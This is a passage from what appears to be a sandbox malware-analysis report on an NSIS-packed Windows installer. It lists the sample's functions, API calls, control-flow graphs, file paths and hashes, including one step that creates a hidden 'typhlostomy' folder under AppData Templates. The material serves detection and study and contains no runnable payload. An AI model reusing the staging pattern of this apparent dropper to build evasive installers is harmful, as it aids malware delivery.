                                                          • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy,1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000), ref: 00403A33
                                                          • GetFileAttributesW.KERNEL32(Call), ref: 00403A3E
                                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy), ref: 00403A87
                                                            • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                          • RegisterClassW.USER32(004281A0), ref: 00403AC4
                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403ADC
                                                          • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B11
                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403B47
                                                          • LoadLibraryW.KERNELBASE(RichEd20), ref: 00403B58
                                                          • LoadLibraryW.KERNEL32(RichEd32), ref: 00403B63
                                                          • GetClassInfoW.USER32(00000000,RichEdit20W,004281A0), ref: 00403B73
                                                          • GetClassInfoW.USER32(00000000,RichEdit,004281A0), ref: 00403B80
                                                          • RegisterClassW.USER32(004281A0), ref: 00403B89
                                                          • DialogBoxParamW.USER32(?,00000000,00403CC2,00000000), ref: 00403BA8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: "C:\Users\user\Desktop\fTSt7dc60O.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$&B
                                                          • API String ID: 914957316-3363473247
                                                          • Opcode ID: 9ff61719f6c30c529665ce4dbc08b581b5599c43b58c29c5b92350d035ae6190
                                                          • Instruction ID: 309fb0296e4a6d1bba18aa3b2e86eaa258190dfd088e540a173f113b23667d40
                                                          • Opcode Fuzzy Hash: 9ff61719f6c30c529665ce4dbc08b581b5599c43b58c29c5b92350d035ae6190
                                                          • Instruction Fuzzy Hash: BE61B570644200BED720AF669C46F2B3A7CEB84749F40457FF945B62E2DB796902CA3D
                                                          Function 00402DBC Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 348 402dbc-402e0a GetTickCount GetModuleFileNameW call 405bb4 351 402e16-402e44 call 405f48 call 4059df call 405f48 GetFileSize 348->351 352 402e0c-402e11 348->352 360 402f34-402f42 call 402d1a 351->360 361 402e4a-402e61 351->361 354 40305b-40305f 352->354 367 403013-403018 360->367 368 402f48-402f4b 360->368 363 402e63 361->363 364 402e65-402e72 call 4032f9 361->364 363->364 372 402e78-402e7e 364->372 373 402fcf-402fd7 call 402d1a 364->373 367->354 370 402f77-402fc3 GlobalAlloc call 4063ce call 405be3 CreateFileW 368->370 371 402f4d-402f65 call 40330f call 4032f9 368->371 396 402fc5-402fca 370->396 397 402fd9-403009 call 40330f call 403062 370->397 371->367 399 402f6b-402f71 371->399 377 402e80-402e98 call 405b6f 372->377 378 402efe-402f02 372->378 373->367 382 402f0b-402f11 377->382 395 402e9a-402ea1 377->395 381 402f04-402f0a call 402d1a 378->381 378->382 381->382 387 402f13-402f21 call 406360 382->387 388 402f24-402f2e 382->388 387->388 388->360 388->361 395->382 398 402ea3-402eaa 395->398 396->354 408 40300e-403011 397->408 398->382 401 402eac-402eb3 398->401 399->367 399->370 401->382 403 402eb5-402ebc 401->403 403->382 405 402ebe-402ede 403->405 405->367 407 402ee4-402ee8 405->407 409 402ef0-402ef8 407->409 410 402eea-402eee 407->410 408->367 411 40301a-40302b 408->411 409->382 412 402efa-402efc 409->412 410->360 410->409 413 403033-403038 411->413 414 40302d 411->414 412->382 415 403039-40303f 413->415 414->413 415->415 416 403041-403059 call 405b6f 415->416 416->354
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00402DD0
                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\fTSt7dc60O.exe,00000400), ref: 00402DEC
                                                            • Part of subcall function 00405BB4: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\fTSt7dc60O.exe,80000000,00000003), ref: 00405BB8
                                                            • Part of subcall function 00405BB4: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA
                                                          • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\fTSt7dc60O.exe,C:\Users\user\Desktop\fTSt7dc60O.exe,80000000,00000003), ref: 00402E35
                                                          • GlobalAlloc.KERNELBASE(00000040,00409230), ref: 00402F7C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                          • String ID: "C:\Users\user\Desktop\fTSt7dc60O.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\fTSt7dc60O.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                          • API String ID: 2803837635-300296061
                                                          • Opcode ID: dbc4309bf9e12582ea8865ce62b28691ef8d5c521c6be9f7d6ce07414c4970ed
                                                          • Instruction ID: b2cc58b1aa553f56ba66d3b0850f03698e33e3340d89f7fe3e9d1fe3a0eb5287
                                                          • Opcode Fuzzy Hash: dbc4309bf9e12582ea8865ce62b28691ef8d5c521c6be9f7d6ce07414c4970ed
                                                          • Instruction Fuzzy Hash: 43610371941205ABDB209FA4DD85B9E3BB8EB04354F20447BF605B72D2C7BC9E418BAD
                                                          Function 00401752 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 545 401752-401777 call 402b3a call 405a0a 550 401781-401793 call 405f48 call 405993 lstrcatW 545->550 551 401779-40177f call 405f48 545->551 556 401798-401799 call 4061dc 550->556 551->556 560 40179e-4017a2 556->560 561 4017a4-4017ae call 40628b 560->561 562 4017d5-4017d8 560->562 569 4017c0-4017d2 561->569 570 4017b0-4017be CompareFileTime 561->570 563 4017e0-4017fc call 405bb4 562->563 564 4017da-4017db call 405b8f 562->564 572 401870-401899 call 4051f2 call 403062 563->572 573 4017fe-401801 563->573 564->563 569->562 570->569 585 4018a1-4018ad SetFileTime 572->585 586 40189b-40189f 572->586 574 401852-40185c call 4051f2 573->574 575 401803-401841 call 405f48 * 2 call 405f6a call 405f48 call 405724 573->575 587 401865-40186b 574->587 575->560 607 401847-401848 575->607 589 4018b3-4018be CloseHandle 585->589 586->585 586->589 590 4029d0 587->590 593 4018c4-4018c7 589->593 594 4029c7-4029ca 589->594 595 4029d2-4029d6 590->595 597 4018c9-4018da call 405f6a lstrcatW 593->597 598 4018dc-4018df call 405f6a 593->598 594->590 604 4018e4-402243 call 405724 597->604 598->604 604->595 607->587 609 40184a-40184b 607->609 609->574
                                                          APIs
                                                          • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy,?,?,00000031), ref: 00401793
                                                          • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy,?,?,00000031), ref: 004017B8
                                                            • Part of subcall function 00405F48: lstrcpynW.KERNEL32(?,?,00000400,004033C8,00428200,NSIS Error), ref: 00405F55
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsk172E.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsk172E.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                            • Part of subcall function 004051F2: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsk172E.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsk172E.tmp\System.dll,00000000,00000000,00000000), ref: 0040524D
                                                            • Part of subcall function 004051F2: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsk172E.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsk172E.tmp\System.dll), ref: 0040525F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsk172E.tmp$C:\Users\user\AppData\Local\Temp\nsk172E.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy$Call
                                                          • API String ID: 1941528284-844687679
                                                          • Opcode ID: 8fd7ff773941625183321c21c1d438156bd1c93f7609a995d7972b8441070f6c
                                                          • Instruction ID: 22a22a0f5d261001ccd7191b61e6a6ae22ba545f5f0eb33ed6189b5534195358
                                                          • Opcode Fuzzy Hash: 8fd7ff773941625183321c21c1d438156bd1c93f7609a995d7972b8441070f6c
                                                          • Instruction Fuzzy Hash: 3341C071900515BACF11BBB5CC86EAF3679EF06369F20423BF422B10E1C73C8A419A6D
                                                          Function 004051F2 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 611 4051f2-405207 612 40520d-40521e 611->612 613 4052be-4052c2 611->613 614 405220-405224 call 405f6a 612->614 615 405229-405235 lstrlenW 612->615 614->615 617 405252-405256 615->617 618 405237-405247 lstrlenW 615->618 619 405265-405269 617->619 620 405258-40525f SetWindowTextW 617->620 618->613 621 405249-40524d lstrcatW 618->621 622 40526b-4052ad SendMessageW * 3 619->622 623 4052af-4052b1 619->623 620->619 621->617 622->623 623->613 624 4052b3-4052b6 623->624 624->613
                                                          APIs
                                                          • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsk172E.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                          • lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsk172E.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                          • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsk172E.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsk172E.tmp\System.dll,00000000,00000000,00000000), ref: 0040524D
                                                          • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsk172E.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsk172E.tmp\System.dll), ref: 0040525F
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                          • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsk172E.tmp\System.dll
                                                          • API String ID: 2531174081-1938704070
                                                          • Opcode ID: 241caa620ce1fcc58b3a3595d79cd8debb0f013b3e7c164dabd01d0a25878295
                                                          • Instruction ID: 09d17c59ce7287a2cbf3dc662f19c44123261f726eb293d34c68041fb2ac0666
                                                          • Opcode Fuzzy Hash: 241caa620ce1fcc58b3a3595d79cd8debb0f013b3e7c164dabd01d0a25878295
                                                          • Instruction Fuzzy Hash: CA21A131900558BBCB219FA5DD849DFBFB8EF54310F14807AF904B62A0C3798A81CFA8
                                                          Function 00402573 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 142fileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 625 402573-402588 call 402b1d 628 4029c7-4029ca 625->628 629 40258e-402595 625->629 632 4029d0-4029d6 628->632 630 402597 629->630 631 40259a-40259d 629->631 630->631 633 4025a3-4025b2 call 405ea8 631->633 634 4026e6-4026ee 631->634 633->634 638 4025b8 633->638 634->628 639 4025be-4025c2 638->639 640 402657-402667 call 405c37 639->640 641 4025c8-4025e3 ReadFile 639->641 640->634 646 402669 640->646 641->634 643 4025e9-4025ee 641->643 643->634 645 4025f4-402602 643->645 647 4026a2-4026ae call 405e8f 645->647 648 402608-40261a MultiByteToWideChar 645->648 649 40266c-40266f 646->649 647->632 648->646 651 40261c-40261f 648->651 649->647 652 402671-402676 649->652 654 402621-40262c 651->654 655 4026b3-4026b7 652->655 656 402678-40267d 652->656 654->649 657 40262e-402653 SetFilePointer MultiByteToWideChar 654->657 660 4026d4-4026e0 SetFilePointer 655->660 661 4026b9-4026bd 655->661 656->655 659 40267f-402692 656->659 657->654 658 402655 657->658 658->646 659->634 664 402694-40269a 659->664 660->634 662 4026c5-4026d2 661->662 663 4026bf-4026c3 661->663 662->634 663->660 663->662 664->639 665 4026a0 664->665 665->634
                                                          APIs
                                                          • ReadFile.KERNELBASE(?,?,?,?), ref: 004025DB
                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402616
                                                          • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402639
                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040264F
                                                            • Part of subcall function 00405C37: ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E90,0040BE90,0040330C,00409230,00409230,004031FE,00413E90,00004000,?,00000000,?), ref: 00405C4B
                                                            • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                          • String ID: 9
                                                          • API String ID: 1149667376-2366072709
                                                          • Opcode ID: 14d7a1a443259207830479a75009ee39c6dacd7ae2e8022bb32dc9fb2f0741b6
                                                          • Instruction ID: 34008a6f5bb5370994306dbe4266d00811a1d2e87b5126a94146f67fdcf6739f
                                                          • Opcode Fuzzy Hash: 14d7a1a443259207830479a75009ee39c6dacd7ae2e8022bb32dc9fb2f0741b6
                                                          • Instruction Fuzzy Hash: 0E51E771E04209ABDF24DF94DE88AAEB779FF04304F50443BE511B62D0D7B99A42CB69
                                                          Function 0040317D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108fileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 666 40317d-4031a6 GetTickCount 667 4032e7-4032ef call 402d1a 666->667 668 4031ac-4031d7 call 40330f SetFilePointer 666->668 673 4032f1-4032f6 667->673 674 4031dc-4031ee 668->674 675 4031f0 674->675 676 4031f2-403200 call 4032f9 674->676 675->676 679 403206-403212 676->679 680 4032d9-4032dc 676->680 681 403218-40321e 679->681 680->673 682 403220-403226 681->682 683 403249-403265 call 4063ee 681->683 682->683 684 403228-403248 call 402d1a 682->684 688 4032e2 683->688 689 403267-40326f 683->689 684->683 693 4032e4-4032e5 688->693 691 403271-403287 WriteFile 689->691 692 4032a3-4032a9 689->692 694 403289-40328d 691->694 695 4032de-4032e0 691->695 692->688 696 4032ab-4032ad 692->696 693->673 694->695 697 40328f-40329b 694->697 695->693 696->688 698 4032af-4032c2 696->698 697->681 699 4032a1 697->699 698->674 700 4032c8-4032d7 SetFilePointer 698->700 699->698 700->667
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00403192
                                                            • Part of subcall function 0040330F: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                          • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000), ref: 004031C5
                                                          • WriteFile.KERNELBASE(0040BE90,00410DE9,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?), ref: 0040327F
                                                          • SetFilePointer.KERNELBASE(00004D7A,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E), ref: 004032D1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: File$Pointer$CountTickWrite
                                                          • String ID: A
                                                          • API String ID: 2146148272-1346673623
                                                          • Opcode ID: 38246e7ae17352d7cedfc7595443620c434811b06811d2a86a618e437c7072d2
                                                          • Instruction ID: 34320a24581f7621071559271f75aff2a33e70c32c739a51ea230fcf3b1a2f41
                                                          • Opcode Fuzzy Hash: 38246e7ae17352d7cedfc7595443620c434811b06811d2a86a618e437c7072d2
                                                          • Instruction Fuzzy Hash: CB418B72504205DFDB109F29EE84AA63BADF74431671441BFE604B22E1C7B96D418BEC
                                                          Function 004015B9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 701 4015b9-4015cd call 402b3a call 405a3e 706 401614-401617 701->706 707 4015cf-4015eb call 4059c0 CreateDirectoryW 701->707 709 401646-402197 call 401423 706->709 710 401619-401638 call 401423 call 405f48 SetCurrentDirectoryW 706->710 714 40160a-401612 707->714 715 4015ed-4015f8 GetLastError 707->715 722 402793-40279a 709->722 723 4029c7-4029d6 709->723 710->723 726 40163e-401641 710->726 714->706 714->707 718 401607 715->718 719 4015fa-401605 GetFileAttributesW 715->719 718->714 719->714 719->718 722->723 726->723
                                                          APIs
                                                            • Part of subcall function 00405A3E: CharNextW.USER32(?,?,00424EF0,?,00405AB2,00424EF0,00424EF0,?,?,774D2EE0,004057F0,?,C:\Users\user\AppData\Local\Temp\,774D2EE0,"C:\Users\user\Desktop\fTSt7dc60O.exe"), ref: 00405A4C
                                                            • Part of subcall function 00405A3E: CharNextW.USER32(00000000), ref: 00405A51
                                                            • Part of subcall function 00405A3E: CharNextW.USER32(00000000), ref: 00405A69
                                                          • CreateDirectoryW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                          • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                          • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                          • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy,?,00000000,000000F0), ref: 00401630
                                                          Strings
                                                          • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy, xrefs: 00401623
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                          • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy
                                                          • API String ID: 3751793516-2517424574
                                                          • Opcode ID: 9b673ddbf1d69572a6be76a75328456f52fe096521e7ed3c2b5c74dd951979b8
                                                          • Instruction ID: 602e027c19ef8137931421d3e2870900c2c1aa36f58208ee64056e3add0ea48c
                                                          • Opcode Fuzzy Hash: 9b673ddbf1d69572a6be76a75328456f52fe096521e7ed3c2b5c74dd951979b8
                                                          • Instruction Fuzzy Hash: 4F11C271904200EBCF206FA0CD449AE7AB4FF14369B34463BF881B62E1D23D49419A6E
                                                          Function 00402B7A Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
